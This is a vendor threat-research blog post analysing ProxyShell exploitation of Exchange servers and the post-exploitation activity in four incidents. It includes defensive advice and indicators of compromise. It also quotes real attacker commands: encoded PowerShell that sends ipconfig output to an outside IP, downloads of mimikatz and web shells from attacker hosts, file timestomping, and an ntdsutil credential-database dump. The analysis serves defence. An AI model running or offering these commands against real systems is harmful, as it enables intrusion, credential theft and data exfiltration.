Cyber Threats
Analyzing ProxyShell-related Incidents via Trend Micro Managed XDR
In this blog entry, we will take a look at the ProxyShell vulnerabilities that were being exploited in these events, and dive deeper into the notable post-exploitation routines that were used in four separate incidents involving these web shell attacks.
The Trend Micro™ Managed XDR team recently observed a surge in server-side compromises — ProxyShell-related intrusions on Microsoft Exchange in particular via the Managed XDR service and other incident response engagements. These compromises, which occurred across different sectors in the Middle East, were most often observed in environments using on-premise implementations of Microsoft Exchange.
In the engagements where the attacker’s objective was realized, we found that the deployment of ransomware was the most common end-goal for the attacks that occurred in the Middle East. This indicates that threat actor groups have begun to favor the use of exploits related to ProxyShell in order to establish initial access to an organization’s system, with the possibility of ransomware attacks being launched down the line.
Using intrusion clusters that had overlaps in initial access techniques, we recently found a set of intrusions that were involved with attacks on the Middle East, which we will be dissecting in this blog entry. All of these intrusions, which share a commonality of exploiting vulnerable ProxyShell servers to gain an initial foothold on their target’s network, were rooted from an IIS Worker Process that was spawning suspicious processes.
Through our observation of the web shell activity on the Trend Micro Vision One Platform and by analyzing the process tree created by the Internet Information Services (IIS) process w3wp.exe, we were able to determine the sequence of processes that are associated with the different attack phases and how they tied in to the threat actor’s objective.
We clustered all the observed intrusions together to reveal some tactical and operational similarities between all the different ransomware affiliates that were deploying the final ransomware payloads. Through the Vision One platform, some intrusions were interrupted early in the infection chain, after which we compared these to other similar intrusions to determine the chain of events (and whether LockFile, Conti, or any current active ransomware families in the Middle East threat landscape will be deployed as part of the routine).
In this blog entry, we will take a look at the ProxyShell vulnerabilities that were being exploited in these events, and dive deeper into the notable post-exploitation routines that were used in four separate incidents involving these web shell attacks.
Observations on the ProxyShell Exploitation
The exploitation of ProxyShell in these attacks involve three vulnerabilities: CVE-2021-34473, CVE-2021-34523 and CVE-2021-31207 — the first two were patched in July 2021, while the latter was fixed in May 2021. Successful exploitation of these vulnerabilities can lead to arbitrary writing of files that an attacker can leverage to upload web shells on a target exchange server.
The malicious actor initially tried to start the attack by scanning for dropped web shells, which we assume were dropped earlier via vulnerability exploitation. This part failed, as the files showed a 404 error code when we tried to access them.
This vulnerability abuses the URL normalization of Explicit Logon URL, where the login email will be removed from the URL if the URL suffix is autodiscover/autodiscover.json. This allows arbitrary backend URL access as the Exchange machine account (NT AUTHORITY\SYSTEM).
The Autodiscover service is abused to leak a known user’s distinguished name (DN), which is an address format used internally within Microsoft Exchange. The Messaging Application Programming Interface (MAPI) is then abused to leak the user's security identifier (SID).
Microsoft Exchange has a PowerShell remoting feature which can be used to read and send emails. This functionality cannot be used by NT AUTHORITY\SYSTEM as it doesn’t have a mailbox, however, the backend /powershell can be provided via the X-Rps-CAT query string parameter in case it is accessed directly using the previous vulnerability, which will be deserialized and used to restore the user identity.
This technique can be used by an attacker to impersonate a local administrator in order to run PowerShell commands.
This vulnerability leverages the New-MailboxExportRequest PowerShell command in order to export the user mailbox to an arbitrary file location, which can be used to write a shell on the Exchange server.
The web shell is imported as mail inside the administrator[@]xxx draft mailbox. It is then exported to c:/inetpub/wwwroot/aspnet_client/puqjc.aspx, after which it is accessed and returned with 200 codes.
An analysis of the file system timeline shows the same — the puqjc.aspx file was created at the same time as the malicious web connection (2:00 PM UTC)
Post-exploitation routines
A web shell is a piece of code written in web development programming language (e.g., ASP, JSP) that attackers can drop into web servers to gain remote access and the ability to execute arbitrary code and commands to meet their objectives. Once a web shell is successfully inserted into the victim’s server, it can allow remote attackers to perform various tasks, such as stealing data or dropping other malicious tools.
Upon analysis of the intrusion clusters, we were able to identify several variants of web shells used by different threat actors. The scanning and exploitation phases were the same in all the incidents, but the post-exploitation activities and their impact varied.
The following subsections go into the specifics of the post-exploitation routines we analyzed in four separate incidents that occurred in August and September 2021. While some of the incidents shared certain behaviors during infection, their post-exploitation routines varied.
In the first incident we handled, we discovered that the web shell employed in the attack uses exec_code query parameter to execute ASP code. After successfully accessing the command-and-control (C&C) server, it executed commands to gather basic information on the compromised system.
- "c:\windows\system32\cmd.exe" /c whoami
- "c:\windows\system32\cmd.exe" /c ping -n 1 google.com
Furthermore, the web shell also executed PowerShell commands, and downloaded and executed other malware.
The web shell includes a script that kills security software from specific vendors, and then disables the system’s firewall.
It then executes a PowerShell-encoded base64 script that downloads another obfuscated PowerShell script, which it then executes. This script is part of the CobaltStrike malware familly which has the ability to provide backdoor access to infected machines.
We also noticed that the malicious actor behind the attack executed scripts to kill specific processes and to clear the PowerShell Windows events log.
The IP addresses 212.84.32[.]13 and 103.25.196[.]33, are servers using the Liferay content managing system (CMS). It seems that these are compromised versions of the software and being used to host the post-exploitation malicious payloads on different ports other than the default ones (80, 443, 8080) used by the CMS.
Both servers are using Liferay CE version 6.2, which is vulnerable to CVE-2020-7961 (possibly leading to remote code execution).
Incident # 2
Similar to the first incident, the malicious actor accesses the server via a web shell and then starts to gather basic information on the system. However, the second incident used PowerShell for different post-exploitation activities.
Our analysis shows that a Wget request was sent to a URL with a high numbered port. Unfortunately, we don’t have information as to what was downloaded since the URL was already dead by the time of analysis.
"C:\Windows\System32\cmd.exe" /c powershell wget http://209.14.0[.]234:56138/iMCRufG79yXvYjH0W1SK
The following commands were executed in order to gather basic system information:
- cmd.exe /c ipconfig
- cmd.exe /c dir
- "c:\windows\system32\cmd.exe" /c ping -n 1 google.com
- "c:\windows\system32\cmd.exe" /c whoami
The web shell was then copied and the original entry deleted using the following commands:
- cmd.exe /c ren C:\inetpub\wwwroot\aspnet_client\errorFF.aspx.req errorFF.aspx
- "c:\windows\system32\cmd.exe" /c del "C:\Program Files\Microsoft\Exchange Server\V15\FrontEnd\HttpProxy\owa\auth\errorFF.aspx.req"
The ipconfig command was executed as an argument for a wget request.
The following code shows the Powershell-encoded (top) and decoded (bottom) commands:
"c:\windows\system32\cmd.exe" /c powershell.exe -exec bypass -enc JAByAD0AaQBwAGMAbwBuAGYAaQBnACAALwBhAGwAbAAgAHwAIABvAHUAdAAtAHMAdAByAGkAbgBnADsAdwBnAGUAdAAgAC0AVQByAGkAIABoAHQAdABwADoALwAvADkAMQAuADkAMgAuADEAMwA2AC4AMgA1ADAAOgA0ADQAMwA/AFMAZABmAGEAPQBmAGQAcwBzAGQAYQBkAHMAZgBzAGYAYQAgAC0ATQBlAHQAaABvAGQAIABQAG8AcwB0ACAALQBCAG8AZAB5ACAAJAByACAALQBDAG8AbgB0AGUAbgB0AFQAeQBwAGUAIAAiAGEAcABwAGwAaQBjAGEAdABpAG8AbgAvAG8AYwB0AGUAdAAtAHMAdAByAGUAYQBtACIA
$r=ipconfig /all | out-string;wget -Uri http://91.92.136.250:443?Sdfa=fdssdadsfsfa -Method Post -Body $r -ContentType "application/octet-stream"
Mimikatz, a tool that allows users to view and save credentials and is often used for post-exploitation activities, was downloaded by PowerShell, as shown with the following encoded (top) and decoded (bottom) commands:
"c:\windows\system32\cmd.exe" /c powershell -exec bypass -enc SQBuAHYAbwBrAGUALQBXAGUAYgBSAGUAcQB1AGUAcwB0ACAALQBVAHIAaQAgACIAaAB0AHQAcAA6AC8ALwA5ADEALgA5ADIALgAxADMANgAuADIANQAwADoANAA0ADMALwBtAGkAbQBpAC4AZQB4AGUAIgAgAC0ATwB1AHQARgBpAGwAZQAgACIAYwA6AFwAdwBpAG4AZABvAHcAcwBcAHQAZQBtAHAAXABtAGkAbQBpAC4AZQB4AGUAIgA=
Invoke-WebRequest -Uri "http://91.92.136.250:443/mimi.exe" -OutFile "c:\windows\temp\mimi.exe"
The web shell then downloaded an additional .aspx web shell and timestamped it to further disguised itself in the system, seen in the following code:
Invoke-WebRequest -Uri "http://91.92.136.250:443/out.aspx" -OutFile "c:\windows\temp\OutlookCM.aspx"
The web shell was then moved to the OWA directory with the following time stamp:
$f1=(Get-Item 'C:\Program Files\Microsoft\Exchange Server\V15\FrontEnd\HttpProxy\owa\auth\OutlookCM.aspx'); $f2=(Get-Item 'C:\Program Files\Microsoft\Exchange Server\V15\FrontEnd\HttpProxy\owa\auth\OutlookCN.aspx'); $f1.creationtime=$f2.creationtime; $f1.lastwritetime=$f2.lastwritetime; $f1.lastaccesstime=$f2.lastaccesstime;
After a few minutes, additional DLLs were created, which was later verified to be web shell files created either by w3wp.exe or UMWorkerProcess.exe.
- c:\windows\microsoft.net\framework64\v4.0.30319\temporary asp.net files\owa\8e05b027\e164d61b\app_web_ffhsdhdi.dll
- c:\windows\microsoft.net\framework64\v4.0.30319\temporary asp.net files\owa\8e05b027\e164d61b\app_web_m123qbjp.dll
In relation to this incident, we found the following malicious components and malware were used:
- OutlookCM.aspx (Trojan.ASP.WEBSHELL.CJ)
- App_Web_ffhsdhdi.dll (Trojan.Win32.WEBSHELL.EQWO)
- App_Web_m123qbjp.dll (Trojan.Win32.WEBSHELL.EQWO)
Other web shells
During our investigation into this cluster, we found a specific web shell variant written in C# within an ASP.net page, which is quite unusual since most web shells that we find are written in PHP instead. This is similar to the bespoke web shell the KRYPTON group utilized in their campaigns. The DLL web shell also had a corresponding ASPX version of it in the same system.
Incident #3
The third incident was different from the first two incidents in terms of credential dumping techniques and lateral movement within the system. In this case, the Microsoft Process Dump tool was used to dump LSSAS and extract the hashes.
The Windows utility PsExec was detected during the lateral movement phase. The attacker used it to access remote machines and servers in order to drop and execute a new backdoor malware.
A pass-the-hash attack technique was used to access remote servers and machines, after which a new malware component was dropped in order to create persistence.
The following malware were dropped on the infected machines:
- CacheTask.dll (Backdoor.Win32.COTX.A)
- dllhost.exe (PUA.Win64.LanGO.B)
- HostDLL.exe (Trojan.Win64.OGNHOST.A)
Persistence was then created on remote machines via scheduled task to keep the backdoor running.
Incident # 4
We analyzed a fourth incident that had an interesting technique for credential dumping, specifically, dumping the database via the NT Directory Service Utility:
"C:\Windows\system32\cmd[.]exe" /c ntdsutil "activate instance ntds" ifm "create full c:\windows\temp\ntd" quit quit
Here is an example of a post-exploitation routine using the ProxyShell instance. After the web shells are dropped, cmd.exe and powershell.exe are used to execute commands on the affected systems.
Security recommendations
For the incidents that we encountered, it should be noted that the affected Microsoft Exchange servers were left unpatched, either knowingly or unknowingly, by their respective IT teams. Microsoft had written in August 2021 that patching to the latest cumulative update (CU) or security update (SU) are indeed the first line of defense against threats that exploit vulnerabilities related to ProxyShell.
While mitigation controls, such as the implementation of a host-based or network-based intrusion prevention system (HIPS/NIPS), can be applied to these servers, it should be noted that these controls would only buy time before any actual patching should occur, providing leeway for IT teams to allow them to trigger the appropriate change management controls.
It is also worthwhile to note that a Microsoft Exchange server would still have an active web shell even if it’s patched after a successful compromise. This means that servers that have been compromised via vulnerabilities related to ProxyShell should be inspected thoroughly for any malicious activities since web shells may already exist (and could continue to still be operational). An active web shell can still allow a malicious actor to continue pursuing their chosen objectives such as ransomware infection, cryptocurrency mining, and data exfiltration.
The implementation of proper segmentation for publicly-exposed servers should always be reviewed, with their behavior (i.e., processes being launched, anti-malware violations, or network traffic profile) being monitored constantly. For example, the observation of internal network scanning, SMB traffic, or other unusual traffic that has not been seen historically can be a sign that the server has been compromised. Earlier this year, Microsoft wrote an excellent guide for hardening web servers against web shell-based attacks.
Trend Micro Solutions
The capabilities of the Trend Micro Vision One™ platform made both the detection of this attack and our investigation into it possible. We took into account metrics from the network and endpoints that would indicate potential attempts of exploitation. The Trend Micro Vision One Workbench shows a holistic view of the activities that are observed in a user’s environment by highlighting important attributes related to the attack.
Trend Micro Managed XDR offers expert threat monitoring, correlation, and analysis from experienced cybersecurity industry veterans, providing 24/7 service that allows organizations to have one single source of detection, analysis, and response. This service is enhanced by solutions that combine AI and Trend Micro’s wealth of global threat intelligence.
TrendMicro Detections
Product Name |
Detections |
Endpoint Security products: |
|
Endpoint Security: |
|
Network Security:
|
|
Network Security: DDI Deep Discovery Inspector |
|
Indicators of Compromise
SHA256 |
Details |
Detection Name |
428D445BA0354CFE78485A50B52B04A949259D32CA939FCE151AA3DD3F352066 |
rundll.bat |
HackTool.BAT.WinDefKiller.C |
28356225C68A84A45C603C5E2EA91A1B2B457DB6F056D82B210CA7853F5CD2F8 |
CacheTask.dll |
Backdoor.Win32.COTX.A |
E3EAC25C3BEB77FFED609C53B447A81EC8A0E20FB94A6442A51D72CA9E6F7CD2 |
dllhost.exe |
PUA.Win64.LanGO.B |
27CB14B58F35A4E3E13903D3237C28BB386D5A56FEA88CDA16CE01CBF0E5AD8E |
HostDLL.exe |
Trojan.Win64.OGNHOST |
5154E76030A08795D22B6CB51F6EA735C3C662409286F21A29B4037231F47043 |
|
Trojan.PS1.COBEACON.SMYXAK-A |
- hxxp:[//]103.25[.]196.33:51680[/]check.
- hxxp:[//]212.84.32.13:18080[/]get
- hxxps:[//]122.10.82.109:8090[/]connect
- hxxp: [//]raw.githubusercontent.com/threatexpress/subshell/master/subshell.aspx
- 103[.]25[.]196[.]33
- 212[.]84[.]32[.]13
- 122[.]10[.]82[.]109
- 209.14.0[.]234
- autodiscover/autodiscover.json
- @evil.corp
- python-requests
- /powershell/?X-Rps-CAT
- Cmd commands (whoami, taskkill, ping, dir, ipconfig)
- CVE-2021-34473
- CVE-2021-34523
- CVE-2021-31207